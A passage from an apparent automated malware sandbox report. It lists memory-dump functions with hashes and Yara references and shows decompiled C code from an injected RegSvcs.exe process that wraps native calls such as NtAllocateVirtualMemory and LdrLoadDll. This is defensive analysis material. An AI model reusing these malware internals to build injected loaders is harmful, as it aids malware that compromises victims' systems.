                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 003520AE, Relevance: .0, Instructions: 16COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2104863989.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 6d8d90dc4f15aecb28d04549204036535474decf77ca3ea596bdffc5c5ff330e
                                                                                                                                                        • Instruction ID: 7b7055636a363a8190a4a74f811f888153e81a03a11c6dbba48f1b408113bad8
                                                                                                                                                        • Opcode Fuzzy Hash: 6d8d90dc4f15aecb28d04549204036535474decf77ca3ea596bdffc5c5ff330e
                                                                                                                                                        • Instruction Fuzzy Hash: 1AE0C2B8E04319CFCB60CF64D888B9EBBB1BF49350F1081A9C449E3220D7309A80CF02
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 003504EE, Relevance: .0, Instructions: 15COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2104863989.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: e4b73d4d9b0618442179ddd3adb73e65dfd7af05949396cd75f0a892b8d73cb2
                                                                                                                                                        • Instruction ID: bfe3ee0b226b01a1f633e6b004682c8aff2c3a7fa8bc6df60c55dea593a3f8c8
                                                                                                                                                        • Opcode Fuzzy Hash: e4b73d4d9b0618442179ddd3adb73e65dfd7af05949396cd75f0a892b8d73cb2
                                                                                                                                                        • Instruction Fuzzy Hash: E0D09275E00108CBCB00DFA9E55D6EDBBB4FB89362F109066DA19B3A24D7301959CF61
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00CA1490, Relevance: .0, Instructions: 12COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2105340448.0000000000CA0000.00000040.00000001.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 78a50d9c54fc095cae0c022143e7949d2fd35f1ec81e352331738531e7fa03c9
                                                                                                                                                        • Instruction ID: 6a22877a56f620f1ae00cd12b1e92d3eeb215376756309213f5fea36021662a9
                                                                                                                                                        • Opcode Fuzzy Hash: 78a50d9c54fc095cae0c022143e7949d2fd35f1ec81e352331738531e7fa03c9
                                                                                                                                                        • Instruction Fuzzy Hash: E9C08C310552098AC3112398E80C3B9B2CC974B33EF582828580C1002287201040C1A0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 003504D0, Relevance: .0, Instructions: 12COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2104863989.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: f81adcbf37f0df6298ed70984dd8d82058418af9675e89cb8b24b40b55f89290
                                                                                                                                                        • Instruction ID: 47645358780b769e4bc2658f090c26c785432cd922d2009bcf6515cceaa638aa
                                                                                                                                                        • Opcode Fuzzy Hash: f81adcbf37f0df6298ed70984dd8d82058418af9675e89cb8b24b40b55f89290
                                                                                                                                                        • Instruction Fuzzy Hash: 05D0CA3AE001088BCB009FA8F90C0ECBB70EB8D262F009062D919F3624D7301815CF60
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 003568D8, Relevance: .0, Instructions: 7COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2104863989.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 45377d6f60cffe826c9cc9ceb44457e4ea82059559cdc9a504f104dbac5ec051
                                                                                                                                                        • Instruction ID: 7c583ea0f045a5bb102aeddc6469afb7d290ae14775a5ee88d3f712be77e1759
                                                                                                                                                        • Opcode Fuzzy Hash: 45377d6f60cffe826c9cc9ceb44457e4ea82059559cdc9a504f104dbac5ec051
                                                                                                                                                        • Instruction Fuzzy Hash: 4BB01270D0810CBF4B00CE84984186CBBBCD708311F2001C59C4DD3700E63106504750
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Non-executed Functions

                                                                                                                                                        Function 003529C8, Relevance: 2.7, Strings: 2, Instructions: 195COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2104863989.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: ,6$JZ D
                                                                                                                                                        • API String ID: 0-44323830
                                                                                                                                                        • Opcode ID: 21305378f4fa52474488d08b27ea2ae40e1507a974a6c3a7211cc61c1fd7f8bc
                                                                                                                                                        • Instruction ID: c56f4a7096cf49fb180c7da9c951d27232514b1b7bbe7db8fde03ef4cd8c9c38
                                                                                                                                                        • Opcode Fuzzy Hash: 21305378f4fa52474488d08b27ea2ae40e1507a974a6c3a7211cc61c1fd7f8bc
                                                                                                                                                        • Instruction Fuzzy Hash: BC815DB0E142098FCB15CFE9D4809AFFBF6BF89315F14852AD804AB265D7349946CFA1
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 003525E8, Relevance: 2.6, Strings: 2, Instructions: 114COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2104863989.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: xD;v$,5
                                                                                                                                                        • API String ID: 0-64609799
                                                                                                                                                        • Opcode ID: d000cd6ed52af74dfeef85f035f29469081e02ebeb783d4458b41170434aa557
                                                                                                                                                        • Instruction ID: 259d5b71a1277d78714d592a603b7b879374c73ebfb4eb1e4fcdda12885eb197
                                                                                                                                                        • Opcode Fuzzy Hash: d000cd6ed52af74dfeef85f035f29469081e02ebeb783d4458b41170434aa557
                                                                                                                                                        • Instruction Fuzzy Hash: FF4158B4D0420ADFCB06CFA5D8449AEFBF6FB89300F20992AC815B7260E7749A45DF51
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0487C3B0, Relevance: 1.7, Strings: 1, Instructions: 435COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2106634828.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 0-3916222277
                                                                                                                                                        • Opcode ID: 16125eefb877e8327ec7dceede28241dafe04167b663dff3f458d48bbe4696a9
                                                                                                                                                        • Instruction ID: 15d631e626397959949cb86d8209fa66e117c3048243d5e84944096c6fccb4a6
                                                                                                                                                        • Opcode Fuzzy Hash: 16125eefb877e8327ec7dceede28241dafe04167b663dff3f458d48bbe4696a9
                                                                                                                                                        • Instruction Fuzzy Hash: F612BF75E002188FDB54CFA9C984BEDBBF2FF88314F148669E909A7255D734A981CF50
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00358DDF, Relevance: 1.4, Strings: 1, Instructions: 192COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2104863989.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: 1
                                                                                                                                                        • API String ID: 0-2212294583
                                                                                                                                                        • Opcode ID: 1d9ac7bfd71bad06a322c6a5f1ae1ffcee8828f61da70b7922335b560637fb28
                                                                                                                                                        • Instruction ID: 003e1a717d247b7c8861d244be513ae299c82644fcc65d77dc227f6b3ace7aa4
                                                                                                                                                        • Opcode Fuzzy Hash: 1d9ac7bfd71bad06a322c6a5f1ae1ffcee8828f61da70b7922335b560637fb28
                                                                                                                                                        • Instruction Fuzzy Hash: 08A17CB0E106298BDB64DF29D980BCCBBF5BF88304F4085E9D55CA2215DB309E99DF15
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00356930, Relevance: 1.4, Strings: 1, Instructions: 146COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2104863989.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: @2&m
                                                                                                                                                        • API String ID: 0-1835149342
                                                                                                                                                        • Opcode ID: fac8abf5456551db7f577c81942b2e0a8cef33ad10ea7dcf175008e045c92941
                                                                                                                                                        • Instruction ID: 336c6ea7c87d70ce0ba2dc386e8de576b75613386b7c96610318057b891439b2
                                                                                                                                                        • Opcode Fuzzy Hash: fac8abf5456551db7f577c81942b2e0a8cef33ad10ea7dcf175008e045c92941
                                                                                                                                                        • Instruction Fuzzy Hash: C6516F309102098FD749EFBAE855AAE7BF6AF88304F04C939D0159B364EF705A85CF91
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 04878684, Relevance: .2, Instructions: 215COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2106634828.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 98e25720f275f2f12736a98e0595e77ac85f75b584c0301ff2d5fe6e1656ab04
                                                                                                                                                        • Instruction ID: de5932c2924fba0d2cdf6840621a7025d1cfc938720690088439ce266ee753ff
                                                                                                                                                        • Opcode Fuzzy Hash: 98e25720f275f2f12736a98e0595e77ac85f75b584c0301ff2d5fe6e1656ab04
                                                                                                                                                        • Instruction Fuzzy Hash: FDB191B0E016288BDB64DFA9C9846CDBBF5FF88304F5085E9E158E7216E7309A95CF44
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 04871593, Relevance: .2, Instructions: 176COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2106634828.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 6b0ebda0145e72d9f48a02ad173dbb48482e2993be3a655c784aecbb7aea0051
                                                                                                                                                        • Instruction ID: 93051fc70369aa229acd562f8f907ec84be2216c654e4ef55370fe596f8f94b7
                                                                                                                                                        • Opcode Fuzzy Hash: 6b0ebda0145e72d9f48a02ad173dbb48482e2993be3a655c784aecbb7aea0051
                                                                                                                                                        • Instruction Fuzzy Hash: A891A070E00A298FDB69DF69C98579DBBF9FF88341F0885E5E04CEA214D7319A918F01
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00CA18A0, Relevance: .1, Instructions: 129COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2105340448.0000000000CA0000.00000040.00000001.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 07d608012ef7f4007efe202b27687d37700dc2b097acda8ba9822005f00ea7dd
                                                                                                                                                        • Instruction ID: 0993b95829682499170e8fe9d5d4c1cc8cf3b3043b7ed0b3964e51e0a04957a8
                                                                                                                                                        • Opcode Fuzzy Hash: 07d608012ef7f4007efe202b27687d37700dc2b097acda8ba9822005f00ea7dd
                                                                                                                                                        • Instruction Fuzzy Hash: 0141A470D1521ACFCB04CFA6D4846EEFBF6BB8A314F28942AD815B7294D7348940DF24
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00CA1891, Relevance: .1, Instructions: 125COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2105340448.0000000000CA0000.00000040.00000001.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 232ab7acccaf0ea2f6b03a9bd2dfef71d8e4042bf47daf746394d375c9d56495
                                                                                                                                                        • Instruction ID: 4fc7075e90412228982913ee140ebb1667ff1e5d479c0131eb989256473e354d
                                                                                                                                                        • Opcode Fuzzy Hash: 232ab7acccaf0ea2f6b03a9bd2dfef71d8e4042bf47daf746394d375c9d56495
                                                                                                                                                        • Instruction Fuzzy Hash: 9041A574D1525ACFCB04CFA6D554AEEFBF2AB8A314F28942AD811B7290D7388940DF24
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00356B84, Relevance: .1, Instructions: 114COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2104863989.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: e9a1919a0927e14e93c152f255efb02ea1dd5fd71397f7bec9fcd47c60670962
                                                                                                                                                        • Instruction ID: 81fe009762a1468b9441540e7f3d6e51894cd5648b125a8a53bf9f962235a9f5
                                                                                                                                                        • Opcode Fuzzy Hash: e9a1919a0927e14e93c152f255efb02ea1dd5fd71397f7bec9fcd47c60670962
                                                                                                                                                        • Instruction Fuzzy Hash: 9E4150B1E056688BEB5DCF6B8D40799FAF7AFC9300F14C1FA994DA6224DB3005868F15
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 04870007, Relevance: .1, Instructions: 109COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2106634828.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: a6aa0a22e0cd1b419eb533d488868ed8ccb45ca318c5d1a7effcf83f23e12a55
                                                                                                                                                        • Instruction ID: 602eb5d1734c1bd045385e96ac55491fea08e24942897dfdea33c84083a9bf8c
                                                                                                                                                        • Opcode Fuzzy Hash: a6aa0a22e0cd1b419eb533d488868ed8ccb45ca318c5d1a7effcf83f23e12a55
                                                                                                                                                        • Instruction Fuzzy Hash: 8C41AD71E097548FEB1ACF678C5029AFBF7AFCA200F19C1BA8448DA166EB340546CF11
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 04870048, Relevance: .1, Instructions: 96COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2106634828.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 157d03c59798c0c4cc3fe058e7a8b232b06577cc621d48e4863ef70dc583e2df
                                                                                                                                                        • Instruction ID: 84f139d1762dc9e406cc4a0b1202e52f3f7840b68439f0562712a338101c5de2
                                                                                                                                                        • Opcode Fuzzy Hash: 157d03c59798c0c4cc3fe058e7a8b232b06577cc621d48e4863ef70dc583e2df
                                                                                                                                                        • Instruction Fuzzy Hash: A4417271E016188BEB5CCF6BCD5079EFAF7AFC9200F14C5BA940CAA265EB3056818F51
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 048765FF, Relevance: .1, Instructions: 92COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2106634828.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 71efb0093f4215aa106464a34b72edb8e31595debf3fc3e6db406b09e9c8f81a
                                                                                                                                                        • Instruction ID: 7fecca80ddb22389959e5e44912e617e2500d1af5b77e2fa209fa617d209bb34
                                                                                                                                                        • Opcode Fuzzy Hash: 71efb0093f4215aa106464a34b72edb8e31595debf3fc3e6db406b09e9c8f81a
                                                                                                                                                        • Instruction Fuzzy Hash: 864174B1E056188BEB1DCF678D5469EFAF3BFC4200F18C5BAC50CAA225EB7405868F15
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Analysis Process: RegSvcs.exe PID: 2520 Parent PID: 2492 RegSvcs.exeCOMMON

                                                                                                                                                        Executed Functions

                                                                                                                                                        Function 00419E10, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36filenativeCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 37%
                                                                                                                                                        			E00419E10(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E0041A960(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t6 =  &_a32; // 0x414d42
				_t12 =  &_a8; // 0x414d42
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
				return _t18;
			}






                                                                                                                                                        0x00419e13
                                                                                                                                                        0x00419e1f
                                                                                                                                                        0x00419e27
                                                                                                                                                        0x00419e32
                                                                                                                                                        0x00419e4d
                                                                                                                                                        0x00419e55
                                                                                                                                                        0x00419e59

                                                                                                                                                        APIs
                                                                                                                                                        • NtReadFile.NTDLL(BMA,5EB6522D,FFFFFFFF,00414A01,?,?,BMA,?,00414A01,FFFFFFFF,5EB6522D,00414D42,?,00000000), ref: 00419E55
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000006.00000002.2151530848.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: FileRead
                                                                                                                                                        • String ID: BMA$BMA
                                                                                                                                                        • API String ID: 2738559852-2163208940
                                                                                                                                                        • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                                                                                        • Instruction ID: bd248b349f18b2ced93d1e709abaf342431bbeaaaaa26160fd0c904447d41470
                                                                                                                                                        • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                                                                                        • Instruction Fuzzy Hash: 45F0B7B2210208AFCB14DF89DC81EEB77ADEF8C754F158649BE1DA7241D630E851CBA4
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0040ACD0, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                        			E0040ACD0(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E0041C650( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041CA70(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041CCF0( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E0041AEA0(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                                                                                                                                                        0x0040acec
                                                                                                                                                        0x0040acef
                                                                                                                                                        0x0040acf4
                                                                                                                                                        0x0040acf9
                                                                                                                                                        0x0040ad03
                                                                                                                                                        0x0040ad08
                                                                                                                                                        0x0040ad0b
                                                                                                                                                        0x0040ad0d
                                                                                                                                                        0x0040ad15
                                                                                                                                                        0x0040ad1a
                                                                                                                                                        0x0040ad1a
                                                                                                                                                        0x0040ad21
                                                                                                                                                        0x0040ad29
                                                                                                                                                        0x0040ad2c
                                                                                                                                                        0x0040ad2e
                                                                                                                                                        0x0040ad42
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0040ad44
                                                                                                                                                        0x0040ad4a
                                                                                                                                                        0x0040acfe
                                                                                                                                                        0x0040acfe
                                                                                                                                                        0x0040acfe

                                                                                                                                                        APIs
                                                                                                                                                        • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD42
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000006.00000002.2151530848.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Load
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2234796835-0
                                                                                                                                                        • Opcode ID: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
                                                                                                                                                        • Instruction ID: b21dceb9c17b581325113e7f9749888d8b8163c3e846858d6705abbd9991eecb
                                                                                                                                                        • Opcode Fuzzy Hash: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
                                                                                                                                                        • Instruction Fuzzy Hash: A8015EB5D4020DBBDF10DBA5DC82FDEB3789F54308F0041AAE909A7281F635EB548B96
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00419D60, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                        			E00419D60(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E0041A960(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}





                                                                                                                                                        0x00419d6f
                                                                                                                                                        0x00419d77
                                                                                                                                                        0x00419dad
                                                                                                                                                        0x00419db1

                                                                                                                                                        APIs
                                                                                                                                                        • NtCreateFile.NTDLL(00000060,00409CD3,?,00414B87,00409CD3,FFFFFFFF,?,?,FFFFFFFF,00409CD3,00414B87,?,00409CD3,00000060,00000000,00000000), ref: 00419DAD
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000006.00000002.2151530848.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CreateFile
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 823142352-0
                                                                                                                                                        • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                                                                        • Instruction ID: 5d405ca8330a7760d33d8cb8f94c0e61ce0ec213ce21d6c827413d184fac496c
                                                                                                                                                        • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                                                                        • Instruction Fuzzy Hash: F1F0B2B2211208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00419F40, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                        			E00419F40(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E0041A960(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}





                                                                                                                                                        0x00419f4f
                                                                                                                                                        0x00419f57
                                                                                                                                                        0x00419f79
                                                                                                                                                        0x00419f7d

                                                                                                                                                        APIs
                                                                                                                                                        • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AB34,?,00000000,?,00003000,00000040,00000000,00000000,00409CD3), ref: 00419F79
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000006.00000002.2151530848.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AllocateMemoryVirtual
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2167126740-0
                                                                                                                                                        • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                                                                                        • Instruction ID: 9c08e1581e5817f7e91e4b21b7a397560e598f802d56d9274a49c90b7c070efe
                                                                                                                                                        • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                                                                                        • Instruction Fuzzy Hash: 1EF015B2210208ABCB14DF89CC81EEB77ADEF88754F158549BE08A7241C630F810CBA4
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00419E8A, Relevance: 1.5, APIs: 1, Instructions: 22nativeCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 84%
                                                                                                                                                        			E00419E8A(char __edx, intOrPtr _a4, void* _a8) {
				char _v117;
				long _t9;
				void* _t14;

				asm("rcl esi, 0x4d");
				_v117 = __edx;
				_t6 = _a4;
				_t3 = _t6 + 0x10; // 0x300
				_t4 = _t6 + 0xc50; // 0x40a923
				E0041A960(_t14, _a4, _t4,  *_t3, 0, 0x2c);
				_t9 = NtClose(_a8); // executed
				return _t9;
			}






                                                                                                                                                        0x00419e8a
                                                                                                                                                        0x00419e8f
                                                                                                                                                        0x00419e93
                                                                                                                                                        0x00419e96
                                                                                                                                                        0x00419e9f
                                                                                                                                                        0x00419ea7
                                                                                                                                                        0x00419eb5
                                                                                                                                                        0x00419eb9

                                                                                                                                                        APIs
                                                                                                                                                        • NtClose.NTDLL(00414D20,?,?,00414D20,00409CD3,FFFFFFFF), ref: 00419EB5
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000006.00000002.2151530848.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Close
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3535843008-0
                                                                                                                                                        • Opcode ID: c1018387def85eeed92f59d50137b54cc45b6d41c7f080cf34bb8c5060453614
                                                                                                                                                        • Instruction ID: 6db9ccbf1bc62842b2b5d528f195f87351d07581d9f56d4640ef1b159193b464
